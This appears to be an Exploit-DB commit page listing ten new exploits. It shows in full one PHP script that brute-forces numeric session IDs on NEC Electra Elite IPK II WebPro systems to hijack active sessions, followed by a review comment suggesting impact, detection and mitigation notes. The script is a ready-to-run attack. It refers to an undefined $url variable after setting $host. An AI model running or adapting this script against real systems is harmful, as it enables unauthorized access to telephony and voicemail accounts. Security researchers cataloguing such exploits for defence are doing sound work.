DB: 2020-05-06
10 changes to exploits/shellcodes

Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path

Saltstack 3000.1 - Remote Code Execution

BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
Fishing Reservation System 7.5 - 'uid' SQL Injection
Online Scheduling System 1.0 - 'username' SQL Injection
webERP 4.15.1 - Unauthenticated Backup File Access
PhreeBooks ERP 5.2.5 - Remote Command Execution
SimplePHPGal 0.7 - Remote File Inclusion
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
Offensive Security committed May 6, 2020
1 parent fd7a524 commit cc95715
Showing 11 changed files with 906 additions and 8 deletions.
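--- a/exploits/hardware/webapps/48425.txt
+++ b/exploits/hardware/webapps/48425.txt
@@ -0,0 +1,63 @@
+# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
+# Author: Cold z3ro
+# Date: 2020-05-04
+# Homepage: https://www.0x30.cc/
+# Vendor Homepage: https://www.nec.com
+# Version: 01.03.01
+# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration
+
+<?php
+set_time_limit(0);
+
+$host = "192.168.0.14";
+
+$start = 100;
+$end = 30000;
+$maxproc= 50;
+$execute=0;
+
+echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
+sleep(3);
+for ($i = $start; $i <= $end; $i++)
+{
+
+$pid = @pcntl_fork();
+$execute++;
+if ($execute >= $maxproc)
+{
+while (pcntl_waitpid(0, $status) != -1)
+{
+$status = pcntl_wexitstatus($status);
+$execute =0;
+usleep(3000);
+}
+}
+if (!$pid)
+{
+echo $url . " checking $i\n";
+login($url, $i);
+flush();
+exit;
+}
+}
+
+
+function login($url, $key)
+{
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
+curl_setopt($ch, CURLOPT_TIMEOUT, 80);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
+curl_setopt($ch, CURLOPT_HEADER, FALSE);
+$content = curl_exec($ch);
+curl_close ($ch);
+if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
+{
+die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
+
+}
+}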
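Review bot: The comment header at the top of the new file (Title through Discription) never states what the weakness is or gives any defensive guidance, so a reader has to infer it from the code. From the loop bounds (`$start = 100`, `$end = 30000`) and the `sessionId=` query parameter, the session identifier appears to be a short numeric value carried in the URL; the header should say so, e.g. `# Impact: WebPro session IDs are short numeric values passed in the URL and can be guessed while a session is active`. A detection line would make the entry usable for defenders, e.g. `# Detection: one client requesting /PyxisUaMenu.htm with many different sessionId values in a short window`, together with a mitigation line such as limiting WebPro access to a management network (not stated by the author; confirm against vendor guidance). `Discription` in the header is a typo for `Description`.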